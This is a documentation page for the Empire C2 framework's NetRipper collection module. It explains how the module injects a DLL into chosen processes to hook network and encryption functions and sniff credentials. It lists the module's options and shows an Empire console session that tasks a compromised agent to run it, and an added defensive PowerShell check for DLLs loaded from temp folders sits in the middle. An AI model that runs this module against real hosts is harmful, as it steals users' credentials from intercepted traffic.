Invoke-NetRipper - Empire Module


This page contains detailed information about how to use the powershell/collection/netripper Empire module. For a list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-NetRipper
Module: powershell/collection/netripper
Source code [1]: empire/server/modules/powershell/collection/netripper.yaml
Source code [2]: empire/server/data/module_source/collection/Invoke-NetRipper.ps1
MITRE ATT&CK: T1179, T1410
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes

The netripper module injects NetRipper into the targeted processes. NetRipper uses API hooking to intercept network traffic and encryption-related functions from a low-privileged user context, so it can capture both plain-text traffic and encrypted traffic before encryption or after decryption.

This module runs in the background and is not OPSEC safe: it writes to disk and can therefore be detected by AV/EDR running on the target system.

Note that the netripper module does not need administrative privileges to work, so a normal user can run it.

Required Module Options


This is a list of options that are required by the netripper module:

Agent
Agent to run module on.

SearchStrings
Strings to search for in traffic.
Default value: user,login,pass,database,config.

Additional Module Options


This is a list of additional options that are supported by the netripper module:

AllData
Switch. Log all data instead of just plaintext.

Datalimit
Maximum amount of data captured per request.
Default value: 4096.

LogLocation
Folder location to log sniffed data to.
Default value: TEMP.

ProcessID
Specific process ID to inject the NetRipper dll into.

ProcessName
Inject the NetRipper dll into all processes with the given name (e.g. putty).
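Because the module injects a DLL that lives on disk into processes chosen by ProcessID or ProcessName, a defender can hunt for the same artifact from the other side: modules loaded into a process from a user-writable temp folder. The following check is an added example, not code from Empire or NetRipper; the process name "putty" and the list of temp roots are assumptions, and module enumeration may fail for processes of a different bitness or protected processes.

```powershell
# Added detection example (not part of Empire or NetRipper).
# Lists modules loaded from user-writable temp folders in the named processes,
# the kind of artifact left by on-disk DLL injection such as the one this module performs.
# Assumptions: target process name(s) and the temp roots below are placeholders.
param(
    [string[]]$ProcessName     = @('putty'),
    [string[]]$SuspiciousRoots = @($env:TEMP, $env:TMP, "$env:LOCALAPPDATA\Temp")
)

function Get-TempLoadedModules {
    param([string[]]$ProcessName, [string[]]$SuspiciousRoots)

    # Normalise roots once: drop empty entries, strip trailing backslash, lower-case.
    $roots = $SuspiciousRoots |
        Where-Object { $_ } |
        ForEach-Object { $_.TrimEnd('\').ToLowerInvariant() } |
        Sort-Object -Unique

    foreach ($proc in Get-Process -Name $ProcessName -ErrorAction SilentlyContinue) {
        # .Modules throws for processes of a different bitness or protected processes.
        try { $modules = $proc.Modules }
        catch { Write-Warning "Cannot enumerate modules of PID $($proc.Id): $_"; continue }

        foreach ($m in $modules) {
            $path = $m.FileName.ToLowerInvariant()
            $hit  = $roots | Where-Object { $path.StartsWith($_ + '\') }
            if (-not $hit) { continue }

            # Unsigned or invalidly signed modules under a temp root deserve a closer look.
            $sig = Get-AuthenticodeSignature -FilePath $m.FileName -ErrorAction SilentlyContinue
            [pscustomobject]@{
                ProcessName = $proc.ProcessName
                PID         = $proc.Id
                Module      = $m.ModuleName
                Path        = $m.FileName
                Signature   = if ($sig) { $sig.Status } else { 'Unknown' }
            }
        }
    }
}

Get-TempLoadedModules -ProcessName $ProcessName -SuspiciousRoots $SuspiciousRoots |
    Format-Table -AutoSize
```

Run it from a PowerShell session of the same bitness as the inspected processes; an empty result means no module in those processes is loaded from the listed temp roots, not that the host is clean.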

Netripper Example Usage


Here's an example of how to use the netripper module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/collection/netripper

 Author       Ionut Popescu (@NytroRST)                                            
              @mattifestation                                                      
              @harmj0y                                                             
 Background   True                                                                 
 Comments     https://github.com/NytroRST/NetRipper/                               
 Description  Injects NetRipper into targeted processes, which uses API hooking in 
              order to intercept network traffic and encryption related functions  
              from a low privileged user, being able to capture both plain-text    
              traffic and encrypted traffic before encryption/after decryption.    
 Language     powershell                                                           
 Name         powershell/collection/netripper                                      
 NeedsAdmin   False                                                                
 OpsecSafe    False                                                                
 Techniques   http://attack.mitre.org/techniques/T1179                             
              http://attack.mitre.org/techniques/T1410                             


,Record Options-,---------------------------------,----------,-------------------------------------,
| Name          | Value                           | Required | Description                         |
|---------------|---------------------------------|----------|-------------------------------------|
| Agent         |                                 | True     | Agent to run module on.             |
|---------------|---------------------------------|----------|-------------------------------------|
| AllData       |                                 | False    | Switch. Log all data instead of     |
|               |                                 |          | just plaintext.                     |
|---------------|---------------------------------|----------|-------------------------------------|
| Datalimit     | 4096                            | False    | Data limit capture per request.     |
|---------------|---------------------------------|----------|-------------------------------------|
| LogLocation   | TEMP                            | False    | Folder location to log sniffed data |
|               |                                 |          | to.                                 |
|---------------|---------------------------------|----------|-------------------------------------|
| ProcessID     |                                 | False    | Specific process ID to inject the   |
|               |                                 |          | NetRipper dll into.                 |
|---------------|---------------------------------|----------|-------------------------------------|
| ProcessName   |                                 | False    | Inject the NetRipper dll into all   |
|               |                                 |          | processes with the given name (i.e. |
|               |                                 |          | putty).                             |
|---------------|---------------------------------|----------|-------------------------------------|
| SearchStrings | user,login,pass,database,config | True     | Strings to search for in traffic.   |
'---------------'---------------------------------'----------'-------------------------------------'

(Empire: usemodule/powershell/collection/netripper) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/collection/netripper) > set SearchStrings user,login,pass,database,config
[*] Set SearchStrings to user,login,pass,database,config
(Empire: usemodule/powershell/collection/netripper) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results.

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.